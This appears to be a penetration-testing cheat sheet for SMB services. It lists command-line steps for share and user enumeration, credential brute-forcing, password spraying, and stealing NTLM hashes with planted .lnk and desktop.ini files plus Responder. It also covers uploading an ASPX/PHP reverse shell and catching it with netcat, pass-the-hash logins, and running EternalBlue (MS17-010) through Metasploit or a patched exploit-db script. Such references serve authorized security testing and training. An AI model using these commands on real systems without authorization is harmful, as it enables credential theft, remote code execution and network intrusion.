# SMB (Server Message Block) Pentesting
It allows clients, like workstations, to communicate with a server like a share directory.\
Samba is derived from SMB for linux. Default ports are
### Enumeration
To enumerate automatically, we can use various tools such as `nmap`, `smbclient`, and so on
```
nmap --script smb-brute -p 139,445
nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 139,445
nmap --script smb-enum* -p 139,445
nmap --script smb-protocols -p 139,445
nmap --script smb-vuln* -p 139,445
# NetBIOS names
nmblookup -A 10.0.0.1
nbtscan 10.0.0.1
nbtscan -r 10.0.0.1/24
# Enum4linux
enum4linux
# All enumeration
enum4linux -a
# Verbose
enum4linux -v
# Specify username and password
enum4linux -u username -p password
# Enum4linux-ng
# -A: All simple enumeration including nmblookup
enum4linux-ng -A
# -As: All simple short enumeration without NetBIOS names lookup
enum4linux-ng -As
# -u: Specific username
# -p: Specific password
enum4linux-ng -u "administrator" -p "password"
# NetExec (https://www.netexec.wiki/)
netexec smb 10.0.0.0/24
netexec smb
netexec smb
netexec smb --pass-pol
netexec smb --groups
netexec smb --users
# With authentication
netexec smb -u username -p password
netexec smb -u username -p password --users
# With Kerberos authentication
netexec smb -k --users
# -M zerologon: Scan for ZeroLogon
# -M petitpotam: Scan for PetitPotam
netexec smb -u '' -p '' -M zerologon -M petitpotam
```
#### Find Shared Folders
```
# -N: No password
# -L: List shared directories
smbclient -N -L
smbclient -L -U username
smbmap -H
# Recursive
smbmap -H -R
# Username and password
smbmap -u username -p password -H
# Execute a command
smbmap -u username -p password -H -x 'ipconfig'
netexec smb -u '' -p '' --shares
netexec smb -u username -p password --shares
impacket-psexec example.local/username@
```
#### Brute Force Credentials
```
netexec smb -u username -p passwords.txt --continue-on-success
netexec smb -u usernames.txt -H ntlm_hashes.txt --continue-on-success
hydra -l username -P passwords.txt smb
hydra -L usernames.txt -p password smb
# RID Brute Force
netexec smb -u username -p password --rid-brute 20000
# Using Metasploit
msfconsole
msf> use auxiliary/scanner/smb/smb_login
```
If we find credentials, we can use them for **smbclient** or **WinRM**.\
If we got **"STATUS\_PASSWORD\_MUST\_CHANGE"** for some users, we can update a current password to a new one.
```
smbpasswd -r -U
# or
impacket-smbpasswd /:@ -newpass
# If you don't have impacket-smbpasswd, download it from a repository.
wget https://raw.githubusercontent.com/fortra/impacket/master/examples/smbpasswd.py
```
### RID Cycling Attack
RID enumeration.\
It attempts to enumerate user accounts through null sessions.
```
# Anonymous logon
# 20000: Maximum RID to be cycled
impacket-lookupsid example.local/anonymous@ 20000 -no-pass
impacket-lookupsid example.local/guest@ 20000 -no-pass
impacket-lookupsid example.local/guest@ 20000
# Specify user
impacket-lookupsid example.local/user@ 20000 -hashes :
impacket-lookupsid example.local/user@ 20000
# USEFUL COMMAND
# This command extract usernames. It's useful for further enumeration which uses usernames.
# Replace the following keywords:
# - `example.com` => Target domain
# - `10.0.0.1` => Target IP
# - `DOMAIN` => Target domain name
impacket-lookupsid example.com/guest@10.0.0.1 20000 -no-pass > tmp.txt | cat tmp.txt | grep SidTypeUser | cut -d ' ' -f 2 | sed 's/DOMAIN\\//g' | sort -u > users.txt && rm tmp.txt
```
### Password Spraying Attack
If we have a user password, we might be able to find another user with the same password.
```
# User enumeration
netexec smb -u John -p Password123 --users
netexec smb -u John -H --users
# Find users with same password
netexec smb -u users.txt -p Password123 --continue-on-success
netexec smb -u users.txt -p found_passwords.txt --continue-on-success
netexec smb -u users.txt -H --continue-on-success
netexec smb -u users.txt -H found_ntlm_hashes.txt --continue-on-success
```
### NTLM Stealing
#### Using ntlm\_theft
Repository:
```
# -g all: Generate all files.
# -s: Local IP (attacker IP)
# -f: Folder to store generated files.
python3 ntlm_theft -g all -s -f samples
```
After generating files with `ntlm_theft` , put the `.lnk` file (`samples.lnk` here) to the shared folder.
```
smbclient -N //10.0.0.1/example
smb> put samples.lnk
```
Now start Responder to retrieve the stolen NTLM hashes. Run the following command in our local machine:
```
sudo responder -I eth0
```
### Connect
You can use smbclient to connect the target.
```
# anonymous login
smbclient //10.0.0.1/somedir -N
# If the folder name contains spaces, surround with double quotes
smbclient "//10.0.0.1/some dir" -N
# Specify user
smbclient //10.0.0.1/somedir -U username
# nobody, no-pass
smbclient //10.0.0.1/somedir -N -U nobody
# Specify workgroup
smbclient -L 10.0.0.1 -W WORKGROUP -U username
```
To get a Windows shell, run the following examples.
```
impacket-wmiexec example.local/username@10.0.0.1
# Pass the Hash
impacket-wmiexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d example.local/username@10.0.0.1
```
### Commands in SMB
After connecting, we can investigate the shared folder to find sensitive files or information.
#### List Folders/Files
```
smb> ls
```
#### Download Folders/Files
```
smb> get sample.txt
# If the filename contains spaces, it need to be enclosed in double-quotes.
smb> get "Example File.txt"
```
To download files recursively, run the following commands.
```
smb> mask ""
smb> recurse ON
smb> prompt OFF
smb> mget *
```
Or using smbget from local machine.\
Especially, it’s useful for **downloading a large file** rather than “get” command in smbclient.
```
smbget smb:///somedir/example.txt -U username
smbget -R smb:///somedir -U username
# Specify workgroup
smbget -R smb:///somedir -w WORKGROUP -U username
# as anonymous user
smbget smb:///somedir -U anonymous
password: anonymous
```
#### Upload Files
```
# Upload a file
smb> put example.txt
```
* **Upload Reverse Shell Payload**
If the website is associated with the SMB server, we can upload reverse shell script such as **`aspx`**, **`php`** and get a shell.\
To create a payload, please refer to the [Web Reverse Shell](https://exploit-notes.hdks.org/exploit/network/shell/web-reverse-shell/) or the [Reverse Shell with Metasploit](https://exploit-notes.hdks.org/exploit/network/shell/reverse-shell-using-metasploit/).
Then upload it to the SMB server as below.
```
smb> put shell.aspx
```
Don’t forget to start a listener for getting outcoming connection.
```
nc -lvnp 4444
```
Now access to **`https://example.com/path/to/smb/share/shell.aspx`**.\
We can get a shell.
#### Steal NTLM Hash with Desktop.ini
Reference:
We can retrieve the hashes by putting **`desktop.ini`** file, that contains arbitrary icon resource path, to the shared folder.\
Create a new **`desktop.ini`** in local machine.
```
[.ShellClassInfo]
IconResource=\\\test
```
Then upload it to the writable shared folder.
```
smb> put desktop.ini
```
Start responder in local machine.
```
responder -I tun0
```
After a while, we can retrieve the NTLM hashes.
### EternalBlue (MS17-010)
```
msfconsole
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set rhosts
msf> set lhost
msf> run
# If you cannot get a shell with the default payloed (windows/x64/meterpreter/reverse_tcp), try to change the payload
msf> set payload payload/generic/shell_reverse_tcp
```
#### AutoBlue
[**AutoBlue**](https://github.com/3ndG4me/AutoBlue-MS17-010) is an automatic exploit.\
Download the repository and run the following example command.
```
python zzz_exploit.py -target-ip -port 445 'username:password@target'
```
#### Manual Exploiting
You need to have two files - exploit.py, mysmb.py
1. **Download mysmb.py**
```
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py -O mysmb.py
# Convert DOS to UNIX
dos2unix mysmb.py
```
1. **Edit Some Lines of mysmb.py for Python3**
You need to edit some code because this exploit is old so only supports **Python2**.
```
Line.69
# transData = b''
transData = ''
Line.73
# transData = ('\x00' * padLen) + str(parameters)
transData = "".join(map(chr,(b'\x00' * padLen))) + str(parameters)
Line.80
# transData += ('\x00' * padLen) + data
transData += "".join(map(chr,(b'\x00' * padLen))) + str(data)
Line.231
# req = str(pkt)
req = pkt.getData()
return b'\x00'*2 + pack('>H', len(req)) + req # assume length is <6553
Line.381
# data += resp['Data'][1:]
data += resp['Data'][1:].decode()
```
1. **Download exploit.py**
```
wget -O exploit.py https://www.exploit-db.com/exploits/42315
# Convert DOS to UNIX
dos2unix exploit.py
```
1. **Edit the Credentials in exploit.py**
```
...
username = "username"
password = "password"
...
```
1. **Run the script**
```
python exploit.py netlogon
python exploit.py lsarpc
python exploit.py samr
```
### Launch SMB Server
```
impacket-smbserver -smb2support share .
# Set username/password
impacket-smbserver -smb2support -username "user" -password "pass" share .
```
The SMB server can be accessed at `/share/`
#### Access from Remote Machine
```
net use \\\share /u:user pass
```
#### Transfer Files
```
# Remote to Local
cp .\example.txt \\\share\example.txt
```